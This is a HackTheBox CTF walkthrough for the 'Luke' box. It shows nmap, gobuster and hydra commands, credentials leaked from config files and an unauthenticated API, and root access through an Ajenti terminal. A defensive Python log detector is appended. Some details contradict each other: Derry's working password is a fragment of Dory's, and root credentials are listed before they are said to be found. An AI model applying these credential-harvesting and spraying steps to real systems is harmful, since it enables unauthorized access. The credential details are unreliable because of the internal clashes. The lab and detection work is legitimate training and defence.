###### tags: `hackthebox` `tutorials` `Luke` `CTF` `hacking` `medium`

# Luke

Luke was a simple box with no privilege escalation, but there was a lot of enumeration, so let's get started.

## Nmap

```
nmap -sC -sV -oA nmap/luke 10.10.10.137
```

```
# Nmap 7.70 scan initiated Mon May 27 05:07:59 2019 as: nmap -sC -sV -oA Luke 10.10.10.137
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-27 15:57 IST
Nmap scan report for luke.io (10.10.10.137)
Host is up (0.16s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3+ (ext.1)
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x    2 0        0             512 Apr 14 12:35 webapp
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.10.15.153
|      Logged in as ftp
|      TYPE: ASCII
|      No session upload bandwidth limit
|      No session download bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 6
|      vsFTPd 3.0.3+ (ext.1) - secure, fast, stable
|_End of status
22/tcp   open  SSH-2.0-OpenSSH_7.8 FreeBSD-20180909
80/tcp   open  http    Apache httpd 2.4.38 ((FreeBSD) PHP/7.3.3)
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.38 (FreeBSD) PHP/7.3.3
|_http-title: Luke
3000/tcp open  http    Node.js Express framework
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
8000/tcp open  http    Ajenti http control panel
|_http-title: Ajenti

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 97.18 seconds
```

## FTP

The FTP server allowed anonymous login, so we log in with the following credentials:

```
Username: anonymous
Password:
```

Inside *webapp* we find a file *for_Chihiro.txt* with the following contents:

```
Dear Chihiro !!

As you told me that you wanted to learn Web Development and Frontend, I can give you a little push by showing the sources of the actual website I've created .
Normally you should know where to look but hurry up because I will delete them soon because of our security policies !

Derry
```

Nothing useful here.

## Web

We run gobuster against all the web ports (80, 3000 and 8000):

```
gobuster -e -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.137/users -f -x php -s 200,204,301,302,307,403,401,500
```

and find the following files:

```
3000=========================
http://10.10.10.137:3000/login/ (Status: 200)
http://10.10.10.137:3000/users/ (Status: 200)
http://10.10.10.137:3000/Login/ (Status: 200)
http://10.10.10.137:3000/Users/ (Status: 200)

80=========================
http://10.10.10.137/login.php (Status: 200)
http://10.10.10.137/member/ (Status: 200)
http://10.10.10.137/management/ (Status: 401)
http://10.10.10.137/css/ (Status: 200)
http://10.10.10.137/js/ (Status: 200)
http://10.10.10.137/vendor/ (Status: 200)
http://10.10.10.137/config.php (Status: 200)

8000=========================
```

Inside config.php on port 80 we find database credentials:

```
$dbHost = 'localhost';
$dbUsername = 'root';
$dbPassword = 'Zk6heYCyv6ZE9Xcg';
$db = "login";
$conn = new mysqli($dbHost, $dbUsername, $dbPassword, $db) or die("Connect failed: %s\n" . $conn->error);
```

We don't know yet where these credentials are used, so we continue enumerating.

### Port 3000

On port 3000 we find a JSON API with a *login* endpoint (the server on port 3000 is not case-sensitive, so *Users* and *users*, or *Login* and *login*, are the same route).

Making a POST request to http://10.10.10.137:3000/login with the credentials found (I used Python for this) returns an auth token. Requesting the users endpoint with that token then gives us a list of users:

```
[{"ID":"1","name":"Admin","Role":"Superuser"},{"ID":"2","name":"Derry","Role":"Web Admin"},{"ID":"3","name":"Yuri","Role":"Beta Tester"},{"ID":"4","name":"Dory","Role":"Supporter"}]
```

And if we request http://10.10.10.137:3000/users/**username** for each of them, we get their respective passwords (I used Burp Intruder for this).
In total we collect the following credentials:

```
Admin:WX5b7)>/rp$U)FW
Derry:rZ86wwLvx7jUxtch
Yuri:bet@tester87
Dory:5y:!xa=ybfe)/QD
root:KpMasng6S5EtTy9Z
```

### Port 80

After trying the collected passwords against every login found (I used hydra to try them all), we find that the HTTP basic auth at http://10.10.10.137/management/ accepts the credentials

```
Derry:!xa=ybfe)/QD
```

Inside we find a list of files, and in config.json we find the credentials for the *Ajenti* login on port 8000:

```
root:KpMasng6S5EtTy9Z
```

## Root Shell

Logging into Ajenti gives us a nice web interface that includes a terminal; it runs with root privileges, which gives us a root shell.
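The web enumeration above worked because a wordlist sweep went unnoticed and config.php was served as readable text. As an added example, not part of the original writeup, here is a small detector over constructed Apache combined-log lines that flags both: a client accumulating 4xx misses (a directory brute-force) and any successful fetch of a file that should never be web-readable. The sample log lines, the miss threshold and the SENSITIVE path set are assumptions.

```python
import re
from collections import Counter

# Constructed sample of Apache combined-log lines (not from the box): a
# gobuster-style sweep from one client that ends by fetching config.php,
# plus one ordinary visitor.
SAMPLE_LOG = """\
10.10.15.153 - - [27/May/2019:16:02:01 +0100] "GET /admin/ HTTP/1.1" 404 196 "-" "gobuster/3.0"
10.10.15.153 - - [27/May/2019:16:02:01 +0100] "GET /backup/ HTTP/1.1" 404 196 "-" "gobuster/3.0"
10.10.15.153 - - [27/May/2019:16:02:01 +0100] "GET /test.php HTTP/1.1" 404 196 "-" "gobuster/3.0"
10.10.15.153 - - [27/May/2019:16:02:02 +0100] "GET /login.php HTTP/1.1" 200 1543 "-" "gobuster/3.0"
10.10.15.153 - - [27/May/2019:16:02:02 +0100] "GET /config.php HTTP/1.1" 200 210 "-" "gobuster/3.0"
10.10.15.153 - - [27/May/2019:16:02:03 +0100] "GET /management/ HTTP/1.1" 401 381 "-" "gobuster/3.0"
10.10.14.2 - - [27/May/2019:16:05:10 +0100] "GET /index.php HTTP/1.1" 200 2201 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')

# Files that should never be served to a browser (assumed list): the app's
# DB config and the management area's config.json both leaked credentials.
SENSITIVE = {"/config.php", "/management/config.json"}

def parse(log_text):
    """Return a dict per line that matches the combined-log format; skip the rest."""
    entries = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            d = m.groupdict()
            d["status"] = int(d["status"])
            entries.append(d)
    return entries

def detect_dir_bruteforce(entries, min_misses=3):
    """Clients whose 401/403/404 count reaches min_misses look like a wordlist sweep."""
    misses = Counter(e["ip"] for e in entries if e["status"] in (401, 403, 404))
    return {ip: n for ip, n in misses.items() if n >= min_misses}

def detect_sensitive_reads(entries):
    """Successful (2xx) fetches of paths that should never be web-readable."""
    return [(e["ip"], e["path"]) for e in entries
            if e["path"] in SENSITIVE and 200 <= e["status"] < 300]

if __name__ == "__main__":
    ents = parse(SAMPLE_LOG)
    print("sweep:", detect_dir_bruteforce(ents))
    print("sensitive:", detect_sensitive_reads(ents))
```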